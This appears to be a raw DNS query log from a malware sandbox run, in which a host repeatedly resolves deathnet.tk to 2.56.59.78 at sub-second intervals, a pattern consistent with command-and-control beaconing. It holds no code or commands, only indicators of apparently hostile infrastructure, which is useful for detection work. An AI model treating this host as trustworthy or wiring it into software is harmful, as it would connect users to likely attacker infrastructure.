              Mar 21, 2022 20:08:37.618396044 CET8.8.8.8192.168.2.230xd3bcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.662560940 CET8.8.8.8192.168.2.230x9134No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.708209991 CET8.8.8.8192.168.2.230xd84No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.752692938 CET8.8.8.8192.168.2.230xa588No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.797671080 CET8.8.8.8192.168.2.230x7ed5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.850737095 CET8.8.8.8192.168.2.230xc8c1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.897629023 CET8.8.8.8192.168.2.230xbf9fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.940576077 CET8.8.8.8192.168.2.230x2658No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.983417988 CET8.8.8.8192.168.2.230x9ccaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.028297901 CET8.8.8.8192.168.2.230x94feNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.072176933 CET8.8.8.8192.168.2.230x10c0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.118469954 CET8.8.8.8192.168.2.230xc312No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.166017056 CET8.8.8.8192.168.2.230x32e2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.211097956 CET8.8.8.8192.168.2.230xefcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.256690979 CET8.8.8.8192.168.2.230x8b8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.301281929 CET8.8.8.8192.168.2.230xf3e0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.344230890 CET8.8.8.8192.168.2.230x630No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.390278101 CET8.8.8.8192.168.2.230xfb74No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.434252024 CET8.8.8.8192.168.2.230xb4bbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.479017019 CET8.8.8.8192.168.2.230x8b3eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.523565054 CET8.8.8.8192.168.2.230x5e9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.568578005 CET8.8.8.8192.168.2.230x4f40No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.613607883 CET8.8.8.8192.168.2.230xf24fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.658107042 CET8.8.8.8192.168.2.230x8de1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.702464104 CET8.8.8.8192.168.2.230xd7dfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.747405052 CET8.8.8.8192.168.2.230x6d56No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.793586016 CET8.8.8.8192.168.2.230x9a5dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.840884924 CET8.8.8.8192.168.2.230x23b0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.887296915 CET8.8.8.8192.168.2.230x6157No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.931746006 CET8.8.8.8192.168.2.230xb169No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.980110884 CET8.8.8.8192.168.2.230xf7a5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.024794102 CET8.8.8.8192.168.2.230x88e3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.067321062 CET8.8.8.8192.168.2.230xe23aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.112435102 CET8.8.8.8192.168.2.230x97f8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.158474922 CET8.8.8.8192.168.2.230xf8b8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.205024004 CET8.8.8.8192.168.2.230x63b9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.250245094 CET8.8.8.8192.168.2.230xe38aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.295236111 CET8.8.8.8192.168.2.230x158No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.340545893 CET8.8.8.8192.168.2.230xafdeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.384836912 CET8.8.8.8192.168.2.230xc16cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.431678057 CET8.8.8.8192.168.2.230xc0deNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.476958990 CET8.8.8.8192.168.2.230x1c12No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.521872044 CET8.8.8.8192.168.2.230x13edNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.568197012 CET8.8.8.8192.168.2.230xa3ddNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.613748074 CET8.8.8.8192.168.2.230xc25No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.659313917 CET8.8.8.8192.168.2.230x54f1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.704714060 CET8.8.8.8192.168.2.230x2e80No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.747994900 CET8.8.8.8192.168.2.230xe6d2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.794312954 CET8.8.8.8192.168.2.230x91ecNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.841332912 CET8.8.8.8192.168.2.230x8bcfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.892750025 CET8.8.8.8192.168.2.230xc640No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.938662052 CET8.8.8.8192.168.2.230xfd6fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.983608007 CET8.8.8.8192.168.2.230x7502No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.028781891 CET8.8.8.8192.168.2.230x549dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.073648930 CET8.8.8.8192.168.2.230xbe15No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.118738890 CET8.8.8.8192.168.2.230x1776No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.161705971 CET8.8.8.8192.168.2.230x29f4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.207487106 CET8.8.8.8192.168.2.230x47c7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.253186941 CET8.8.8.8192.168.2.230xc3e2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.299804926 CET8.8.8.8192.168.2.230xc1d6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.346410036 CET8.8.8.8192.168.2.230xe981No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.396842003 CET8.8.8.8192.168.2.230x86bdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.444686890 CET8.8.8.8192.168.2.230x3ebeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.761548042 CET8.8.8.8192.168.2.230xde82No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.817708015 CET8.8.8.8192.168.2.230x167No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.865691900 CET8.8.8.8192.168.2.230x1cd4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.910667896 CET8.8.8.8192.168.2.230xd84cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.961699009 CET8.8.8.8192.168.2.230x29b4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.009063005 CET8.8.8.8192.168.2.230x718cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.053479910 CET8.8.8.8192.168.2.230x2b54No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.100547075 CET8.8.8.8192.168.2.230xebdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.150702000 CET8.8.8.8192.168.2.230xa390No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.201723099 CET8.8.8.8192.168.2.230x8520No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.249706984 CET8.8.8.8192.168.2.230xbe7eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.423610926 CET8.8.8.8192.168.2.230xba23No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.634206057 CET8.8.8.8192.168.2.230x1454No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.678761005 CET8.8.8.8192.168.2.230xb971No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.729783058 CET8.8.8.8192.168.2.230xf6b8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.774764061 CET8.8.8.8192.168.2.230x378No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.822757959 CET8.8.8.8192.168.2.230x6f1aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.870786905 CET8.8.8.8192.168.2.230x53ccNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.918771982 CET8.8.8.8192.168.2.230x12b2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.964596987 CET8.8.8.8192.168.2.230xc2adNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.014789104 CET8.8.8.8192.168.2.230xac71No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.068842888 CET8.8.8.8192.168.2.230x1093No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.118810892 CET8.8.8.8192.168.2.230xcf4aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.164735079 CET8.8.8.8192.168.2.230xdd6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.212594032 CET8.8.8.8192.168.2.230xe8aaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.261779070 CET8.8.8.8192.168.2.230xbd96No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.318764925 CET8.8.8.8192.168.2.230x5358No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.364892960 CET8.8.8.8192.168.2.230x32c0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:42.418840885 CET8.8.8.8192.168.2.230x1bddNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.707847118 CET8.8.8.8192.168.2.230x2d25No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.751097918 CET8.8.8.8192.168.2.230xc326No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.799365044 CET8.8.8.8192.168.2.230x6797No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.844496012 CET8.8.8.8192.168.2.230x7acaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.892642975 CET8.8.8.8192.168.2.230x9342No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.940941095 CET8.8.8.8192.168.2.230x1b60No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:47.983855009 CET8.8.8.8192.168.2.230xb124No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.028201103 CET8.8.8.8192.168.2.230x5010No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.091521978 CET8.8.8.8192.168.2.230x6934No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.221187115 CET8.8.8.8192.168.2.230x3698No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.267007113 CET8.8.8.8192.168.2.230xb3dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.313767910 CET8.8.8.8192.168.2.230xe01dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.375036001 CET8.8.8.8192.168.2.230x2e94No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.434036970 CET8.8.8.8192.168.2.230x1d94No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.479398012 CET8.8.8.8192.168.2.230xa25fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.524559021 CET8.8.8.8192.168.2.230x52e5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.569060087 CET8.8.8.8192.168.2.230x65fcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.615724087 CET8.8.8.8192.168.2.230xfac5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.663803101 CET8.8.8.8192.168.2.230x74d6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:48.708985090 CET8.8.8.8192.168.2.230x87e4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.774454117 CET8.8.8.8192.168.2.230xbdfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.821340084 CET8.8.8.8192.168.2.230x75bcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.866156101 CET8.8.8.8192.168.2.230x8534No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.911494017 CET8.8.8.8192.168.2.230xc933No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.954602957 CET8.8.8.8192.168.2.230x4e82No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:49.997673035 CET8.8.8.8192.168.2.230xce69No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.040491104 CET8.8.8.8192.168.2.230x8a49No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.086590052 CET8.8.8.8192.168.2.230x2e42No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.131465912 CET8.8.8.8192.168.2.230x97d5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.175163984 CET8.8.8.8192.168.2.230x9f1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.504808903 CET8.8.8.8192.168.2.230x98f7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.550527096 CET8.8.8.8192.168.2.230x2bcfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.600903034 CET8.8.8.8192.168.2.230x128fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.667253017 CET8.8.8.8192.168.2.230x3905No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.711277962 CET8.8.8.8192.168.2.230x24faNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.756088972 CET8.8.8.8192.168.2.230x2a17No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.799179077 CET8.8.8.8192.168.2.230x4229No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.845455885 CET8.8.8.8192.168.2.230x613eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.895673037 CET8.8.8.8192.168.2.230x9c3dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.942425966 CET8.8.8.8192.168.2.230x1e5fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:50.988210917 CET8.8.8.8192.168.2.230x239eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.030642986 CET8.8.8.8192.168.2.230x3264No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.076272964 CET8.8.8.8192.168.2.230x3eb4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.121798038 CET8.8.8.8192.168.2.230xdac0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.167277098 CET8.8.8.8192.168.2.230x304aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.212017059 CET8.8.8.8192.168.2.230x3868No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.257708073 CET8.8.8.8192.168.2.230x7328No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.300312996 CET8.8.8.8192.168.2.230xf7edNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.347485065 CET8.8.8.8192.168.2.230xaf49No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.392877102 CET8.8.8.8192.168.2.230x10fcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.437602997 CET8.8.8.8192.168.2.230x45beNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.484297991 CET8.8.8.8192.168.2.230xb659No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.532342911 CET8.8.8.8192.168.2.230x2dbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.588375092 CET8.8.8.8192.168.2.230x726No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.631150007 CET8.8.8.8192.168.2.230xc62bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.676079988 CET8.8.8.8192.168.2.230xbbdcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.721384048 CET8.8.8.8192.168.2.230xf05eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.764362097 CET8.8.8.8192.168.2.230x8391No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.807605982 CET8.8.8.8192.168.2.230xb230No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.852915049 CET8.8.8.8192.168.2.230x734aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.897414923 CET8.8.8.8192.168.2.230xc2a6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.939963102 CET8.8.8.8192.168.2.230xcd49No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:51.985613108 CET8.8.8.8192.168.2.230xc013No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.028537989 CET8.8.8.8192.168.2.230xa75bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.073182106 CET8.8.8.8192.168.2.230xf7acNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.116420984 CET8.8.8.8192.168.2.230x544cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.159697056 CET8.8.8.8192.168.2.230x65d1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:52.202318907 CET8.8.8.8192.168.2.230x747fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.249901056 CET8.8.8.8192.168.2.230xad1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.295161963 CET8.8.8.8192.168.2.230x2acaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.338747025 CET8.8.8.8192.168.2.230x3c0bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.384143114 CET8.8.8.8192.168.2.230x7c9dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.429150105 CET8.8.8.8192.168.2.230x86b0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.471781015 CET8.8.8.8192.168.2.230xd018No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.516841888 CET8.8.8.8192.168.2.230xbbc2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.561475039 CET8.8.8.8192.168.2.230x25c5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.606473923 CET8.8.8.8192.168.2.230xe2e5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.651439905 CET8.8.8.8192.168.2.230x1b2cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.696170092 CET8.8.8.8192.168.2.230x6075No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.740803003 CET8.8.8.8192.168.2.230x8251No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.783885002 CET8.8.8.8192.168.2.230xb9deNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.828814983 CET8.8.8.8192.168.2.230x8b50No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.873349905 CET8.8.8.8192.168.2.230xc55bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.920535088 CET8.8.8.8192.168.2.230x8fefNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:57.965074062 CET8.8.8.8192.168.2.230x36f7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.011909008 CET8.8.8.8192.168.2.230xd730No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.059031963 CET8.8.8.8192.168.2.230xae27No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.102864027 CET8.8.8.8192.168.2.230x6efdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.146243095 CET8.8.8.8192.168.2.230xd6caNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.191586018 CET8.8.8.8192.168.2.230x6cbbNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.236073971 CET8.8.8.8192.168.2.230xd490No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.281208038 CET8.8.8.8192.168.2.230x8411No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.324327946 CET8.8.8.8192.168.2.230xaefaNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.369683981 CET8.8.8.8192.168.2.230x3624No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.413542986 CET8.8.8.8192.168.2.230xb80bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.459369898 CET8.8.8.8192.168.2.230x48d7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.505884886 CET8.8.8.8192.168.2.230xa3daNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.555093050 CET8.8.8.8192.168.2.230x7224No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.601114035 CET8.8.8.8192.168.2.230x53c2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.652559996 CET8.8.8.8192.168.2.230x94ffNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.702354908 CET8.8.8.8192.168.2.230x771No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.750057936 CET8.8.8.8192.168.2.230x21b8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.795047998 CET8.8.8.8192.168.2.230x213aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.837800026 CET8.8.8.8192.168.2.230x3223No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.882580042 CET8.8.8.8192.168.2.230x4546No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.925370932 CET8.8.8.8192.168.2.230xb448No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:08:58.970302105 CET8.8.8.8192.168.2.230xe489No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
